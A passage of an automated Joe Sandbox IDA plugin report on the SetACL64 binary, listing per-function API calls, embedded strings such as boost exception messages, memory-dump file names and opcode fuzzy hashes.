                                • Part of subcall function 00007FF697072864: EnterCriticalSection.KERNEL32(?,?,00000000,00007FF69704ABCE,?,?,00000000,00007FF6970310A5), ref: 00007FF697072874
                              Strings
                              • D:\Code\uberAgent\Libraries\boost\boost\exception\detail\exception_ptr.hpp, xrefs: 00007FF69704B42F
                              • bad exception, xrefs: 00007FF69704B390
                              • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 00007FF69704B424
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: __std_exception_destroy$CriticalEnterSection
                              • String ID: D:\Code\uberAgent\Libraries\boost\boost\exception\detail\exception_ptr.hpp$bad exception$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                              • API String ID: 2585855615-497953542
                              • Opcode ID: 5cb6a45f1239e3b2c4532f3151a5061be94b55bfe2cba1f0f6b6aad54e40ba79
                              • Instruction ID: 915ec3f83331f336c24b995561ee27c12e739d9b6d853e9b1bf2520c43453b7b
                              • Opcode Fuzzy Hash: 5cb6a45f1239e3b2c4532f3151a5061be94b55bfe2cba1f0f6b6aad54e40ba79
                              • Instruction Fuzzy Hash: 96B16AB2B05B459AEB20CF64E8402AC73B5FB58B98B048176CE4DD3B68EF38E555C340
                              APIs
                              • __std_exception_destroy.LIBVCRUNTIME ref: 00007FF69704B2B8
                              • __std_exception_destroy.LIBVCRUNTIME ref: 00007FF69704B2F5
                                • Part of subcall function 00007FF697072864: EnterCriticalSection.KERNEL32(?,?,00000000,00007FF69704ABCE,?,?,00000000,00007FF6970310A5), ref: 00007FF697072874
                              Strings
                              • D:\Code\uberAgent\Libraries\boost\boost\exception\detail\exception_ptr.hpp, xrefs: 00007FF69704B0AF
                              • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 00007FF69704B0A4
                              • bad allocation, xrefs: 00007FF69704B010
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: __std_exception_destroy$CriticalEnterSection
                              • String ID: D:\Code\uberAgent\Libraries\boost\boost\exception\detail\exception_ptr.hpp$bad allocation$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                              • API String ID: 2585855615-1037022726
                              • Opcode ID: 5e9cbe34132cbb56183852d500463e094e47345ad778f8edf29a13b90190a2c1
                              • Instruction ID: 846b00b19fdbe9eb976d4c2a8932627f2a07b6fff59665242e09c0aecca23778
                              • Opcode Fuzzy Hash: 5e9cbe34132cbb56183852d500463e094e47345ad778f8edf29a13b90190a2c1
                              • Instruction Fuzzy Hash: D1B16BB2B05B419AEB20CF64E8401AC73B5FB58B98B448676CE4DD3B68EF38E555C340
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: AllocErrorLast
                              • String ID: tss
                              • API String ID: 4252645092-1638339373
                              • Opcode ID: 29b1765d9a66d25320b0dddf9ab890fdc794b5e67b2e205c5b857635990049a4
                              • Instruction ID: 1d97d5e15c7d1ca688aaaee1f38a74e02d1c84a2129ed515eb667478f0d7dc12
                              • Opcode Fuzzy Hash: 29b1765d9a66d25320b0dddf9ab890fdc794b5e67b2e205c5b857635990049a4
                              • Instruction Fuzzy Hash: 26216FF5E09A4282E6309B24E88507963B0FF683E4F5006B1DA9DC27E5EF3CE5548700
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: AddressFreeHandleLibraryModuleProc
                              • String ID: CorExitProcess$mscoree.dll
                              • API String ID: 4061214504-1276376045
                              • Opcode ID: 731fd435a3bb48197be4118f7954fb208c5f98b7c3500d785dc345691a66c0b5
                              • Instruction ID: fd2bd2b275132ed20262fbfb725f94f65fe90fc47599d4fd67f2c7e80f4ed899
                              • Opcode Fuzzy Hash: 731fd435a3bb48197be4118f7954fb208c5f98b7c3500d785dc345691a66c0b5
                              • Instruction Fuzzy Hash: 3BF05EE1B19A4281FF689F60E8843B96361EF94FE0F0414B5D80FC6660DE6CE488C300
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: AdjustPointer
                              • String ID:
                              • API String ID: 1740715915-0
                              • Opcode ID: 9cd00bc65b5929a6a166b842d15e1553bccd8dfd8d4598a16b21d71fb64958ac
                              • Instruction ID: cdab1569186101b94f80b16d138bb652419dec6ddee612be1f45f98e67ebede9
                              • Opcode Fuzzy Hash: 9cd00bc65b5929a6a166b842d15e1553bccd8dfd8d4598a16b21d71fb64958ac
                              • Instruction Fuzzy Hash: 05B1A0E2E0AB8282FE75DB1198906B867A1EF44BC4F5984B5EE4DCB795DE3CE451C300
                              APIs
                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF69708E97D
                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FF69708E8FB,?,?,?,00007FF697088743), ref: 00007FF69708EA3C
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FF69708E8FB,?,?,?,00007FF697088743), ref: 00007FF69708EABC
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 2210144848-0
                              • Opcode ID: d45fe1b8cdaaec9b8e6fa35954052590595965d4a81a8b9fc00c55fb06775732
                              • Instruction ID: d84afd8e1de90ad143fe6d317f0044efedc798440af79433e18440749cee1d8f
                              • Opcode Fuzzy Hash: d45fe1b8cdaaec9b8e6fa35954052590595965d4a81a8b9fc00c55fb06775732
                              • Instruction Fuzzy Hash: 3781CEB2F1865285FB709B6588802FD2AA0FF54FD8F5442B6DE0ED7B95DE3AA441C310
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$BufferClientFreeInfo_invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 1720291354-0
                              • Opcode ID: 75da794e4bc783c4a2d79550abe500da8be22825966d2fcdd0e41012ba63a114
                              • Instruction ID: 61ebf1c97546f047ec957c187f29c619611e0a261b60d7aa5917134c80b1b819
                              • Opcode Fuzzy Hash: 75da794e4bc783c4a2d79550abe500da8be22825966d2fcdd0e41012ba63a114
                              • Instruction Fuzzy Hash: 1261D1A2B18A8281EA249B29D4543AE3761FB85FE4F405271DB5DC7AD9DF7DE580C300
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _set_statfp
                              • String ID:
                              • API String ID: 1156100317-0
                              • Opcode ID: bd59eed8a6f0dd15b1754f9599e9c4058d21ae63c9d51c95e5ebd76b830cc49a
                              • Instruction ID: c3ec20f924dd5efbfb06116acec1f769187425a704d017780797d73e44e94e63
                              • Opcode Fuzzy Hash: bd59eed8a6f0dd15b1754f9599e9c4058d21ae63c9d51c95e5ebd76b830cc49a
                              • Instruction Fuzzy Hash: C751D6E3D0CD4685F6769B38D8123B6A260FF507E4F1482B5E95EE6ED4DF3EA4818600
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _set_statfp
                              • String ID:
                              • API String ID: 1156100317-0
                              • Opcode ID: a0e95ead0251a3d4b91f5b95471b4db42acbeaa8104238e2645d395e8be0b7d9
                              • Instruction ID: 132274d72899aa202f7a3de8309c8462e6f0d9de254b20432d1c8b8f25999a1c
                              • Opcode Fuzzy Hash: a0e95ead0251a3d4b91f5b95471b4db42acbeaa8104238e2645d395e8be0b7d9
                              • Instruction Fuzzy Hash: 401191F2E1CA0715F7741328D9523B51541FF643F0E0946B4EAAECA7DACE2CA8614105
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Is_bad_exception_allowed
                              • String ID: csm$csm$csm
                              • API String ID: 2758241748-393685449
                              • Opcode ID: a2d6ed14fbf6e40508f258423ea3b56d009d783b16296921d7f948e16fc77ced
                              • Instruction ID: a422ae18237fe7795466932cd13a1cafdda90cd3d2cbc25a42a644869784f36c
                              • Opcode Fuzzy Hash: a2d6ed14fbf6e40508f258423ea3b56d009d783b16296921d7f948e16fc77ced
                              • Instruction Fuzzy Hash: D0E1AFB2E08782CAEB209F24D8853AD77A0FB45788F144175DA8ED7796DF38E485CB40
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                              • String ID: gfffffff$gfffffff
                              • API String ID: 73155330-161084747
                              • Opcode ID: 65c4fbde1530cd6c047e0c087b113539f9e2fee0312e09cc542a9da4f50b182a
                              • Instruction ID: 8c3f780f5c5c580ff8ffd813a4490c6f862483b351b2ff458a71d87291c80d9e
                              • Opcode Fuzzy Hash: 65c4fbde1530cd6c047e0c087b113539f9e2fee0312e09cc542a9da4f50b182a
                              • Instruction Fuzzy Hash: 02A1AEA2A05B8982DE24CF16E4502AD73A4F798BC4F518636DF8DC7745DF38E295C301
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                              • API String ID: 3215553584-1196891531
                              • Opcode ID: 1bb88c3171e5cf5bbab3d2ebdd36e20614571ae61b64ac2c66acfc21f2ce36b7
                              • Instruction ID: 55169cbd610448d8985987aa720b6a1940dfb22dca18a2f244248d7c548c2c7a
                              • Opcode Fuzzy Hash: 1bb88c3171e5cf5bbab3d2ebdd36e20614571ae61b64ac2c66acfc21f2ce36b7
                              • Instruction Fuzzy Hash: E981D0F2E0C24285FB754F298610379E6A0EB31BC8F5590B5DA8ED76D4CF2DE8019B41
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: CallEncodePointerTranslator
                              • String ID: MOC$RCC
                              • API String ID: 3544855599-2084237596
                              • Opcode ID: 42ee9dd8031fa90d2704141954d4b245ff7b62f28e672c949d78bded72fb3b52
                              • Instruction ID: e953fe5179cadd6a8bc481bf6f68f826587914253d729d36bff539b9c590eff3
                              • Opcode Fuzzy Hash: 42ee9dd8031fa90d2704141954d4b245ff7b62f28e672c949d78bded72fb3b52
                              • Instruction Fuzzy Hash: 81918EB3A08B85CAE760CB65E8802AD7BA0FB447C8F14416AEB8DD7759DF38D195C700
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID: $*
                              • API String ID: 3215553584-3982473090
                              • Opcode ID: c990fed08c054b4bafabfd0712f02d3fa7d918f2f89bfa53ed27954d69bca4da
                              • Instruction ID: 39734ea763d5fd8893879a52bf822e0708b6e06ffab38f3e7a6ff278bb169f07
                              • Opcode Fuzzy Hash: c990fed08c054b4bafabfd0712f02d3fa7d918f2f89bfa53ed27954d69bca4da
                              • Instruction Fuzzy Hash: 1B6164F290D252C6E7798F28885417D3BA1FB05F88F5451BADB4AC2298EF3CE841CB54
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                              • String ID: csm$csm
                              • API String ID: 3896166516-3733052814
                              • Opcode ID: eecb3a479b2a8091ed75647188cb13960218c4eb8784a86b31c02a998fb32c90
                              • Instruction ID: 4127bdb7b6aeef9f6c75d09c083ba86eecd49841dbce4071d3cda1d1a1995a2b
                              • Opcode Fuzzy Hash: eecb3a479b2a8091ed75647188cb13960218c4eb8784a86b31c02a998fb32c90
                              • Instruction Fuzzy Hash: 20515DB2908682C6EB748B21D9443B977A0FB54BD8F189175DACEC7B95CF3CE4608B01
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID: -$e+000$gfff
                              • API String ID: 3215553584-2620144452
                              • Opcode ID: b957d2cc3425ec91ce08f74e2f63db020459ef895d73246136ae502abcf24435
                              • Instruction ID: 93081b9b83a27ce45eb1d6cca590f267c4e9e4267880e2d50f8ada78e04ad2e2
                              • Opcode Fuzzy Hash: b957d2cc3425ec91ce08f74e2f63db020459ef895d73246136ae502abcf24435
                              • Instruction Fuzzy Hash: 8151E5A2B286C146E7759F39D8413AD7B91E781BD0F4892B1DB98C7BD6CE2DD444C700
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterFileLeaveModuleName_invalid_parameter_noinfo_noreturn
                              • String ID: .log
                              • API String ID: 3890993197-299349702
                              • Opcode ID: d1984f5f7160b112c225d9afbce00dc298177562a86290b7b952876b9305a88a
                              • Instruction ID: 3f477e57370d5291ae05552674f38748e24ae23cdf6ee21af2189bca79f12d3b
                              • Opcode Fuzzy Hash: d1984f5f7160b112c225d9afbce00dc298177562a86290b7b952876b9305a88a
                              • Instruction Fuzzy Hash: E321B4E1A0964290EE30AB24E8452796771FF95BE0F801671EB6DC77E9EF3CE5848700
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: String$AllocFree$Uninitialize
                              • String ID: Jo
                              • API String ID: 3194604352-866799578
                              • Opcode ID: fb526238290185d568cb8d2a9593fae541931b6e55344edac3bb91d1d3bb4913
                              • Instruction ID: 0ea9b586222b74f8ae59490fff70f4f9974ff9f5cef57c6c4fb148e48e12245c
                              • Opcode Fuzzy Hash: fb526238290185d568cb8d2a9593fae541931b6e55344edac3bb91d1d3bb4913
                              • Instruction Fuzzy Hash: 6B1191E2B0594291FA20AB29D55537E2362FF44BD4F504872CB0CC7692EF3CE5D08204
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                              • String ID:
                              • API String ID: 3936042273-0
                              • Opcode ID: 4c107eee0b4e4811bc64223c6d6b2de02e59749188d4f6f301365c20f6b63f69
                              • Instruction ID: 265c33bbef06f9c8847e2b71f81e9a5638b2fe2d514c0e54c23eecc8ea3d6857
                              • Opcode Fuzzy Hash: 4c107eee0b4e4811bc64223c6d6b2de02e59749188d4f6f301365c20f6b63f69
                              • Instruction Fuzzy Hash: 8771C0A2B19B4199EB10DF25D4403AC2361FB68BE8F408671DB6C837D9EF38E190C340
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
